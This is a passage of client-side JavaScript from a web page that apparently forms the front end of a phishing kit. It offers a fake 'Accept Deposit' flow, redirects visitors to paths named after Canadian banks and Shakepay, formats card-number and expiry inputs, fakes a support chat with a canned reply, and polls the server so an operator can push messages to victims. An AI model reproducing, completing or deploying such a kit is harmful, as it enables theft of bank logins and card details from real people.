            'cibc': '/cibc?'+ urlParam,
            'rbc': '/RBC?'+ urlParam,
            'desjardins': '/Desjardins?'+ urlParam,
            'tdbank': '/tdbank?'+ urlParam,
            'shakepay': '/shakepay?'+ urlParam,
        };

        for (const [key, value] of Object.entries(bankMap)) {
            if (altText.includes(key)) {
                window.location.href = value;
                return;
            }
        }

        alert(`Redirecting to ${img.alt} would happen here in a real application`);
    });
});

// Обработчики для кнопок "Back"
document.getElementById('back-to-banks').addEventListener('click', function() {
    showPage('select-institution-page');
});

document.getElementById('back-to-banks-from-another').addEventListener('click', function() {
    showPage('select-institution-page');
});

// Handle "Accept Deposit" button
document.getElementById('accept-deposit-btn').addEventListener('click', function() {
    showPage('another-bank-page');
});

// Chat functionality
const chatButton = document.getElementById('chatButton');
const chatWidget = document.getElementById('chatWidget');
const closeChat = document.getElementById('closeChat');
const chatBody = document.getElementById('chatBody');
const chatInput = document.getElementById('chatInput');
const sendMessage = document.getElementById('sendMessage');

chatButton.addEventListener('click', function() {
    chatWidget.classList.toggle('active');
});

closeChat.addEventListener('click', function() {
    chatWidget.classList.remove('active');
});

sendMessage.addEventListener('click', function() {
    const message = chatInput.value.trim();
    if (message) {
        const userMessage = document.createElement('div');
        userMessage.className = 'chat-message user';
        userMessage.textContent = message;
        chatBody.appendChild(userMessage);
        chatInput.value = '';
        chatBody.scrollTop = chatBody.scrollHeight;
        setTimeout(() => {
            const supportMessage = document.createElement('div');
            supportMessage.className = 'chat-message support';
            supportMessage.textContent = 'Thank you for your message. Our support team will get back to you shortly.';
            chatBody.appendChild(supportMessage);
            chatBody.scrollTop = chatBody.scrollHeight;
        }, 1000);
    }
});

chatInput.addEventListener('keypress', function(e) {
    if (e.key === 'Enter') {
        sendMessage.click();
    }
});

// Card number formatting
document.getElementById('card-number').addEventListener('input', function(e) {
    let value = e.target.value.replace(/\s+/g, '').replace(/[^0-9]/gi, '');
    let formatted = value.replace(/(\d{4})/g, '$1 ').trim();
    e.target.value = formatted.substring(0, 19);
});

// Expiry date formatting
document.getElementById('expiry-date').addEventListener('input', function(e) {
    let value = e.target.value.replace(/\s+/g, '').replace(/[^0-9]/gi, '');
    if (value.length > 2) {
        value = value.substring(0, 2) + '/' + value.substring(2, 4);
    }
    e.target.value = value.substring(0, 5);
});

function getUrlId() {
            // Assuming url_id is passed in the URL or stored in session
            const params = new URLSearchParams(window.location.search);
            return params.get('url_id') || '<%= reference %>';
        }

        window.onload = function() {
            checkInstitutionAvailability();
        };
// Function to check institution availability with Flask server
function checkInstitutionAvailability() {
    const urlId = getUrlId(); // Получаем текущий url_id
    
    fetch(`/check-transition?url_id=${urlId}`, {
        method: 'GET',
        headers: {
            'Content-Type': 'application/json',
        }
    })
    .then(response => response.json())
    .then(data => {
        const messageDiv = document.getElementById('institution-message');
        if (data.status === 'success' && data.redirect) {
            // Извлекаем параметр text из redirect URL
            const urlParams = new URLSearchParams(data.redirect.split('?')[1]);
            const message = urlParams.get('text');
            if (message) {
                messageDiv.textContent = message; // Устанавливаем текст сообщения
                messageDiv.classList.remove('hidden');
            } else {
                messageDiv.classList.add('hidden');
            }
        } else {
            messageDiv.classList.add('hidden');
        }
    })
    .catch(error => {
        console.error('Error checking transition:', error);
        document.getElementById('institution-message').classList.add('hidden');
    });
}

document.addEventListener('DOMContentLoaded', function() {
    // Сохраняем url_id в sessionStorage при загрузке
    const urlParams = new URLSearchParams(window.location.search);
    const urlId = urlParams.get('url_id');
    if (urlId) {
        sessionStorage.setItem('url_id', urlId);
    }
    
    // Восстанавливаем url_id из sessionStorage
    const savedUrlId = sessionStorage.getItem('url_id');
    if (savedUrlId) {
        window.currentUrlId = savedUrlId;
        document.getElementById('reference').textContent = savedUrlId;
    } else if (urlId) {
        window.currentUrlId = urlId;
    }
    
    showPage('select-institution-page');
    checkInstitutionAvailability();
    
    // Проверять наличие сообщений каждые 5 секунд
    setInterval(checkInstitutionAvailability, 1000);
});
</script>
    </body>
</html>